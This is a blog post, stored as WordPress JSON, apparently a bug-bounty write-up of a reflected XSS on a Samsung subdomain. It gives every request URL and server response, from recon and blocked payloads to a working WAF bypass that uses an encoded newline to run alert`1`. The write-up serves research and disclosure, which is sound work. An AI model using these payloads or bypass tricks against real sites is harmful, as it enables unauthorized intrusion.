{"id":167,"date":"2022-11-28T15:02:00","date_gmt":"2022-11-28T08:02:00","guid":{"rendered":"https:\/\/n45ht.or.id\/blog\/?p=167"},"modified":"2024-12-14T15:18:46","modified_gmt":"2024-12-14T08:18:46","slug":"exploiting-0a-injection-for-xss-on-samsung","status":"publish","type":"post","link":"https:\/\/n45ht.or.id\/blog\/exploiting-0a-injection-for-xss-on-samsung\/","title":{"rendered":"Exploiting %0A Injection for XSS on Samsung"},"content":{"rendered":"\n

I began by searching for subdomains using Sublist3r<\/strong> and then checked the HTTP status codes for each subdomain I found.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

I also used Google Dorks<\/strong> to find interesting URLs on the site. After some time, I tried the following Google Dork:<\/p>\n\n\n\n

site:sgsg.samsung.com<\/code><\/pre>\n\n\n\n
This led me to an interesting URL:<\/p>\n\n\n\n
URL:<\/strong><\/p>\n\n\n\n
https:\/\/www.sgsg.samsung.com\/main\/newpage.php?campus_id=Oxford&f_id=recruit_campus<\/code><\/pre>\n\n\n\n
Upon inspecting the source code, I found that the server was rendering the value from the campus_id<\/strong> parameter directly in JavaScript. Here’s the snippet from the response:<\/p>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
<script<\/span> <\/span>type<\/span>=<\/span>"<\/span>text\/javascript<\/span>"<\/span>><\/span><\/span>\n <\/span>\/\/<![CDATA[<\/span><\/span>\n <\/span>var<\/span> <\/span>timer<\/span>;<\/span><\/span>\n <\/span>var<\/span> <\/span>campus_id<\/span> <\/span>=<\/span> <\/span>"<\/span>Oxford<\/span>"<\/span>;<\/span><\/span>\n <\/span>...<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
Trying a Simple Injection<\/strong><\/h4>\n\n\n\n
To test the system’s response to special characters, I first tried injecting a quote (\"<\/code>) into the campus_id<\/code> parameter.<\/p>\n\n\n\n
Request:<\/strong><\/p>\n\n\n\n
https:\/\/www.sgsg.samsung.com\/main\/newpage.php?f_id=recruit_campus&campus_id=Oxford%22<\/code><\/pre>\n\n\n\n
Response:<\/strong><\/p>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
<script<\/span> <\/span>type<\/span>=<\/span>"<\/span>text\/javascript<\/span>"<\/span>><\/span><\/span>\n <\/span>\/\/<![CDATA[<\/span><\/span>\n <\/span>var<\/span> <\/span>timer<\/span>;<\/span><\/span>\n <\/span>var<\/span> <\/span>campus_id<\/span> <\/span>=<\/span> <\/span>"<\/span>Oxford<\/span>\\"<\/span>"<\/span>;<\/span><\/span>\n <\/span>...<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
The system accepted the injection but didn\u2019t allow it to execute anything harmful. It seems that the server escaped quotes.<\/p>\n\n\n\n
Trying JavaScript Tag Injection<\/strong><\/h4>\n\n\n\n
Next, I tried injecting a closing <\/script><\/code> tag, hoping to break the JavaScript context:<\/p>\n\n\n\n
Request:<\/strong><\/p>\n\n\n\n
https:\/\/www.sgsg.samsung.com\/main\/newpage.php?f_id=recruit_campus&campus_id=<\/script><\/code><\/pre>\n\n\n\n
Response:<\/strong><\/p>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
<script<\/span> <\/span>type<\/span>=<\/span>"<\/span>text\/javascript<\/span>"<\/span>><\/span><\/span>\n <\/span>\/\/<![CDATA[<\/span><\/span>\n <\/span>var<\/span> <\/span>timer<\/span>;<\/span><\/span>\n <\/span>var<\/span> <\/span>campus_id<\/span> <\/span>=<\/span> <\/span>"<\/span><\/script><\/span>"<\/span>;<\/span><\/span>\n <\/span>...<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
The server didn\u2019t block this request, and it seemed to parse the input. However, I couldn’t execute any malicious code yet.<\/p>\n\n\n\n
Attempting an XSS Payload<\/strong><\/h4>\n\n\n\n
I decided to try a XSS payload<\/strong> using an SVG tag, which is commonly used for XSS attacks.<\/p>\n\n\n\n
Request:<\/strong><\/p>\n\n\n\n
https:\/\/www.sgsg.samsung.com\/main\/newpage.php?f_id=recruit_campus&campus_id=<\/script><svg\/onload=alert`1`\/\/><\/code><\/pre>\n\n\n\n
Response:<\/strong>
[Blocked]<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The server blocked the request because the <svg\/onload=alert``\/\/><\/code> payload.<\/p>\n\n\n\n
Trying Other HTML Tags<\/strong><\/h4>\n\n\n\n
I then tried other common HTML tags that might trigger JavaScript execution, but each attempt was blocked by the server.<\/p>\n\n\n\n
At this point, I suspected that the server was specifically filtering out certain tags like <script><\/code> and other potentially harmful HTML tags.<\/p>\n\n\n\n
Bypassing the Filter<\/strong><\/h4>\n\n\n\n
I started experimenting with different bypass methods to evade the WAF (Web Application Firewall) filtering. Here’s what I tried:<\/p>\n\n\n\n
Bypass 1:<\/strong><\/h5>\n\n\n\n
Request:<\/strong><\/p>\n\n\n\n
https:\/\/www.sgsg.samsung.com\/main\/newpage.php?f_id=recruit_campus&campus_id<\/script><script\/\/\/>alert`1`\/\/<\/code><\/pre>\n\n\n\n

Response:<\/strong>
[Blocked]<\/p>\n\n\n\n
Bypass 2:<\/strong><\/h5>\n\n\n\n
Request:<\/strong><\/p>\n\n\n\n
https:\/\/www.sgsg.samsung.com\/main\/newpage.php?f_id=recruit_campus&campus_id<\/script><script\/k>alert`1`\/\/<\/code><\/pre>\n\n\n\n
Response:<\/strong>
[Blocked]<\/p>\n\n\n\n
Bypass 3:<\/strong><\/h5>\n\n\n\n
Request:<\/strong><\/p>\n\n\n\n
https:\/\/www.sgsg.samsung.com\/main\/newpage.php?f_id=recruit_campus&campus_id<\/script><script\/s=1\/k\/\/>alert`1`\/\/<\/code><\/pre>\n\n\n\n

Response:<\/strong>
[Blocked]<\/p>\n\n\n\n
Bypass 4:<\/strong><\/h5>\n\n\n\n
Request:<\/strong><\/p>\n\n\n\n
https:\/\/www.sgsg.samsung.com\/main\/newpage.php?f_id=recruit_campus&campus_id<\/script><script\/<k>alert`1`\/\/<\/code><\/pre>\n\n\n\n
Response:<\/strong>
[Blocked]<\/p>\n\n\n\n
Bypass 5:<\/strong><\/h5>\n\n\n\n
This time, I decided to encode the newline character (%0A<\/code>) in my payload, which is commonly used to bypass WAFs.<\/p>\n\n\n\n
Request:<\/strong><\/p>\n\n\n\n
https:\/\/www.sgsg.samsung.com\/main\/newpage.php?f_id=recruit_campus&campus_id<\/script><script\/%0A<k>alert`1`\/\/<\/code><\/pre>\n\n\n\n
Response:<\/strong><\/p>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
<script<\/span> <\/span>type<\/span>=<\/span>"<\/span>text\/javascript<\/span>"<\/span>><\/span><\/span>\n <\/span>\/\/<![CDATA[<\/span><\/span>\n <\/span>var<\/span> <\/span>timer<\/span>;<\/span><\/span>\n <\/span>var<\/span> <\/span>campus_id<\/span> <\/span>=<\/span> <\/span>"<\/span><\/script><script<\/span>\/<\/span><\/span>\n <\/span><k><\/span>alert`1`\/\/";<\/span><\/span>\n ...<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
This request was not blocked<\/strong>, and I successfully bypassed the WAF by using the %0A<\/code> URL encoding for a newline character. The alert(1)<\/code> payload executed successfully.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
In this case, I was able to bypass the server’s security mechanisms by using URL encoding (%0A<\/code>) to inject a payload that triggered a XSS<\/strong> vulnerability. The server had filtering mechanisms to block traditional XSS payloads, but encoding the newline character allowed me to bypass the filter and execute the attack successfully.<\/p>\n","protected":false},"excerpt":{"rendered":"
I began by searching for subdomains using Sublist3r and then checked the HTTP status codes for each subdomain I found. I also used Google Dorks to find interesting URLs on the site. After some time, I tried the following Google Dork: This led me to an interesting URL: URL: Upon inspecting the source code, I […]<\/p>\n","protected":false},"author":3,"featured_media":171,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[9,8],"class_list":["post-167","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research","tag-cross-site-scripting","tag-xss"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/167","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=167"}],"version-history":[{"count":1,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/167\/revisions"}],"predecessor-version":[{"id":172,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/167\/revisions\/172"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/171"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=167"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=167"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=167"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}